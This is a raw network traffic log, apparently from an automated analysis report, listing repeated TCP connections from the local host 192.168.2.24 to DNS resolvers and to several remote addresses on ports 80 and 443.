Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443

Source: global traffic	TCP traffic: 192.168.2.24:64066 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 1.1.1.1:53 -> 192.168.2.24:64066
Source: global traffic	TCP traffic: 192.168.2.24:64066 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 1.1.1.1:53 -> 192.168.2.24:64066
Source: global traffic	TCP traffic: 192.168.2.24:64066 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 1.1.1.1:53 -> 192.168.2.24:64066
Source: global traffic	TCP traffic: 192.168.2.24:64066 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.24:63564 -> 162.159.36.2:53
Source: global traffic	TCP traffic: 162.159.36.2:53 -> 192.168.2.24:63564
Source: global traffic	TCP traffic: 192.168.2.24:63564 -> 162.159.36.2:53
Source: global traffic	TCP traffic: 162.159.36.2:53 -> 192.168.2.24:63564
Source: global traffic	TCP traffic: 192.168.2.24:63564 -> 162.159.36.2:53
Source: global traffic	TCP traffic: 162.159.36.2:53 -> 192.168.2.24:63564
Source: global traffic	TCP traffic: 192.168.2.24:63564 -> 162.159.36.2:53
Source: global traffic	TCP traffic: 192.168.2.24:63570 -> 3.39.89.152:443
Source: global traffic	TCP traffic: 3.39.89.152:443 -> 192.168.2.24:63570
Source: global traffic	TCP traffic: 192.168.2.24:63570 -> 3.39.89.152:443
Source: global traffic	TCP traffic: 192.168.2.24:63570 -> 3.39.89.152:443
Source: global traffic	TCP traffic: 3.39.89.152:443 -> 192.168.2.24:63570
Source: global traffic	TCP traffic: 3.39.89.152:443 -> 192.168.2.24:63570
Source: global traffic	TCP traffic: 192.168.2.24:63570 -> 3.39.89.152:443
Source: global traffic	TCP traffic: 192.168.2.24:63570 -> 3.39.89.152:443
Source: global traffic	TCP traffic: 3.39.89.152:443 -> 192.168.2.24:63570
Source: global traffic	TCP traffic: 3.39.89.152:443 -> 192.168.2.24:63570
Source: global traffic	TCP traffic: 192.168.2.24:63570 -> 3.39.89.152:443
Source: global traffic	TCP traffic: 192.168.2.24:63570 -> 3.39.89.152:443
Source: global traffic	TCP traffic: 3.39.89.152:443 -> 192.168.2.24:63570
Source: global traffic	TCP traffic: 192.168.2.24:63570 -> 3.39.89.152:443
Source: global traffic	TCP traffic: 3.39.89.152:443 -> 192.168.2.24:63570
Source: global traffic	TCP traffic: 192.168.2.24:63570 -> 3.39.89.152:443
Source: global traffic	TCP traffic: 192.168.2.24:63570 -> 3.39.89.152:443
Source: global traffic	TCP traffic: 3.39.89.152:443 -> 192.168.2.24:63570
Source: global traffic	TCP traffic: 3.39.89.152:443 -> 192.168.2.24:63570
Source: global traffic	TCP traffic: 192.168.2.24:63570 -> 3.39.89.152:443
Source: global traffic	TCP traffic: 3.39.89.152:443 -> 192.168.2.24:63570
Source: global traffic	TCP traffic: 192.168.2.24:63570 -> 3.39.89.152:443
Source: global traffic	TCP traffic: 192.168.2.24:63570 -> 3.39.89.152:443
Source: global traffic	TCP traffic: 3.39.89.152:443 -> 192.168.2.24:63570
Source: global traffic	TCP traffic: 192.168.2.24:63570 -> 3.39.89.152:443
Source: global traffic	TCP traffic: 192.168.2.24:63571 -> 172.245.191.88:80
Source: global traffic	TCP traffic: 172.245.191.88:80 -> 192.168.2.24:63571
Source: global traffic	TCP traffic: 192.168.2.24:63571 -> 172.245.191.88:80
Source: global traffic	TCP traffic: 192.168.2.24:63571 -> 172.245.191.88:80
Source: global traffic	TCP traffic: 172.245.191.88:80 -> 192.168.2.24:63571
Source: global traffic	TCP traffic: 172.245.191.88:80 -> 192.168.2.24:63571
Source: global traffic	TCP traffic: 172.245.191.88:80 -> 192.168.2.24:63571
Source: global traffic	TCP traffic: 172.245.191.88:80 -> 192.168.2.24:63571
Source: global traffic	TCP traffic: 172.245.191.88:80 -> 192.168.2.24:63571
Source: global traffic	TCP traffic: 172.245.191.88:80 -> 192.168.2.24:63571
Source: global traffic	TCP traffic: 172.245.191.88:80 -> 192.168.2.24:63571
Source: global traffic	TCP traffic: 192.168.2.24:63571 -> 172.245.191.88:80
Source: global traffic	TCP traffic: 172.245.191.88:80 -> 192.168.2.24:63571
Source: global traffic	TCP traffic: 172.245.191.88:80 -> 192.168.2.24:63571
Source: global traffic	TCP traffic: 172.245.191.88:80 -> 192.168.2.24:63571
Source: global traffic	TCP traffic: 172.245.191.88:80 -> 192.168.2.24:63571
Source: global traffic	TCP traffic: 192.168.2.24:63571 -> 172.245.191.88:80
Source: global traffic	TCP traffic: 192.168.2.24:63571 -> 172.245.191.88:80
Source: global traffic	TCP traffic: 172.245.191.88:80 -> 192.168.2.24:63571
Source: global traffic	TCP traffic: 172.245.191.88:80 -> 192.168.2.24:63571
Source: global traffic	TCP traffic: 172.245.191.88:80 -> 192.168.2.24:63571
Source: global traffic	TCP traffic: 172.245.191.88:80 -> 192.168.2.24:63571
Source: global traffic	TCP traffic: 192.168.2.24:63571 -> 172.245.191.88:80
Source: global traffic	TCP traffic: 192.168.2.24:63571 -> 172.245.191.88:80
Source: global traffic	TCP traffic: 172.245.191.88:80 -> 192.168.2.24:63571
Source: global traffic	TCP traffic: 192.168.2.24:63571 -> 172.245.191.88:80
Source: global traffic	TCP traffic: 172.245.191.88:80 -> 192.168.2.24:63571
Source: global traffic	TCP traffic: 172.245.191.88:80 -> 192.168.2.24:63571
Source: global traffic	TCP traffic: 192.168.2.24:63571 -> 172.245.191.88:80
Source: global traffic	TCP traffic: 192.168.2.24:63571 -> 172.245.191.88:80
Source: global traffic	TCP traffic: 192.168.2.24:63571 -> 172.245.191.88:80
Source: global traffic	TCP traffic: 192.168.2.24:63575 -> 13.107.246.60:443
Source: global traffic	TCP traffic: 13.107.246.60:443 -> 192.168.2.24:63575
Source: global traffic	TCP traffic: 192.168.2.24:63575 -> 13.107.246.60:443
Source: global traffic	TCP traffic: 192.168.2.24:63576 -> 13.107.246.60:443
Source: global traffic	TCP traffic: 13.107.246.60:443 -> 192.168.2.24:63576
Source: global traffic	TCP traffic: 192.168.2.24:63576 -> 13.107.246.60:443
Source: global traffic	TCP traffic: 192.168.2.24:63575 -> 13.107.246.60:443
Source: global traffic	TCP traffic: 13.107.246.60:443 -> 192.168.2.24:63575
Source: global traffic	TCP traffic: 192.168.2.24:63576 -> 13.107.246.60:443
Source: global traffic	TCP traffic: 13.107.246.60:443 -> 192.168.2.24:63576
Source: global traffic	TCP traffic: 13.107.246.60:443 -> 192.168.2.24:63575
Source: global traffic	TCP traffic: 192.168.2.24:63575 -> 13.107.246.60:443
Source: global traffic	TCP traffic: 192.168.2.24:63575 -> 13.107.246.60:443
Source: global traffic	TCP traffic: 13.107.246.60:443 -> 192.168.2.24:63575
Source: global traffic	TCP traffic: 13.107.246.60:443 -> 192.168.2.24:63576
Source: global traffic	TCP traffic: 192.168.2.24:63576 -> 13.107.246.60:443
Source: global traffic	TCP traffic: 192.168.2.24:63576 -> 13.107.246.60:443
Source: global traffic	TCP traffic: 192.168.2.24:63576 -> 13.107.246.60:443
Source: global traffic	TCP traffic: 13.107.246.60:443 -> 192.168.2.24:63576
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
